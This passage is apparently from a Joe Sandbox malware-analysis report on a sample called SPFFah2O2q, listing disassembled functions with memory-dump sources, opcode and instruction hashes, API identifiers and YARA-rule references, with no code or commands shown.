                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D
                                                                                                                                                                                                                                                                Function 021132ED Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
                                                                                                                                                                                                                                                                • Instruction ID: 7d94a87190f3f4078926bed15256a5588888a011bfd6d09bfa57843c8287a8fe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30E0E575C91110AFDB107B11FC02A1C7AB3AB62302B961175E408A3230FF325A3AEB59
                                                                                                                                                                                                                                                                Function 02116E96 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
                                                                                                                                                                                                                                                                • Instruction ID: cd98d05516a6056fc46c173dead248a3200adc009bfc9247f914e630bdc68f69
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAD02E2288A8B38B0F298E148120239A72B0A031043AF03B088C1BFB42CB33C80342E8
                                                                                                                                                                                                                                                                Function 00427AD3 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                                                                                                                                                                                                                                • Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E
                                                                                                                                                                                                                                                                Function 02119F40 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
                                                                                                                                                                                                                                                                • Instruction ID: 2310f031b25e9bf0509559ae23760092ab28691770f3e69791aae9b064805d0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8D09E72C54244AFD9409F00DC41B6AB3BAFB4A704F441565B988B1161E762EA288B57
                                                                                                                                                                                                                                                                Function 0041C653 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                                                                                                                                                                                                • Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E
                                                                                                                                                                                                                                                                Function 0210C8BA Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
                                                                                                                                                                                                                                                                • Instruction ID: 656f03ea0ba798a0d7369c4efd873f8aa6c4bc019a108f24c413af68ab3025bf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AD0127BFC21004B9A499F10DD43BB56A6397C7704B0CE134C905D3748EA3DE41A940E
                                                                                                                                                                                                                                                                Function 0040BFFD Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                                                                                                                                                                                                                                                Function 020FC264 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                                                                                                                                                                                                                                                Function 02117D1A Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                                                                                                                                                                                                                                                • Instruction ID: 310d4e9ec3f478ee9049038b4584abc09a6d07098bd320122b1c4786a80be0a3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BB092A1C82D108B94913F202C018EAB6261D13340F046030CA0626600BA27EA2A689F
                                                                                                                                                                                                                                                                Function 02119AB5 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                                                                                                                                                                                                                                                • Instruction ID: 7c874190e71e0fbb0cda3392969414040c90f325fa5a96b92036f724b8e84a06
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59B012D0C44600C7D8409F205C008B1A23C4607210F003420C108E7101E131E400550D
                                                                                                                                                                                                                                                                Function 0042984F Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                                                                                                                                                                                                • Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E
                                                                                                                                                                                                                                                                Function 0212898E Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
                                                                                                                                                                                                                                                                • Instruction ID: 5f90c8482877ae364e78efe8602c82ba5110085f469652caa7ae2d3bb2038f17
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC900224D4D1008681508F449440470E279930B111F103410900CF3062C310D545455D
                                                                                                                                                                                                                                                                Function 00431715 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                                                • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                                • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                • Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767
                                                                                                                                                                                                                                                                Function 0212197C Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                                                • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                                • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                • Instruction ID: 9984ae5028406fb0d81c9c50bffc3836b1e52f57bf149ad731b65c15f35c6558
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B81066010CBD28AD326C63C881874FBFD15BE7224F184B9DE1F94B3E2D6A58146C727
                                                                                                                                                                                                                                                                Function 004312D1 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                                                • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                                • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                • Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                                                                                                                                                                                                Function 02121538 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                                                • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                                • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                                • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                • Instruction ID: a4bcf618902c6d2940809fd1c3f37cb63b243fa97388cc7d2922cc7a68f78d26
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B881E72010CBC289D326C63C885875FBFD15BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                                                                                                                                                                                                Function 0042E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                                • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                                • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                                • Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
                                                                                                                                                                                                                                                                Function 0211EC54 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                                • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                                • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                                • Instruction ID: 4d7ffbd8e8d69b3ee4eb56be95ebb3ee5d8baba8eb5a075dafeeea71908fe8ca
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
                                                                                                                                                                                                                                                                Function 0042F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                                • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                                • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                • Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
                                                                                                                                                                                                                                                                Function 0211FA9A Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                                • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                                • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                • Instruction ID: 41a4f298d148376ae300d7e6d0bbe1f054f428072605f5e252c564d1606650b7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7141E820108BC1CED726CF3C8498616BFA16B66224F088ADDD8E54F3DBC375D51ACB66
                                                                                                                                                                                                                                                                Function 00432409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                                                • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                                • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                                • Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                                                                                                                                                • Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
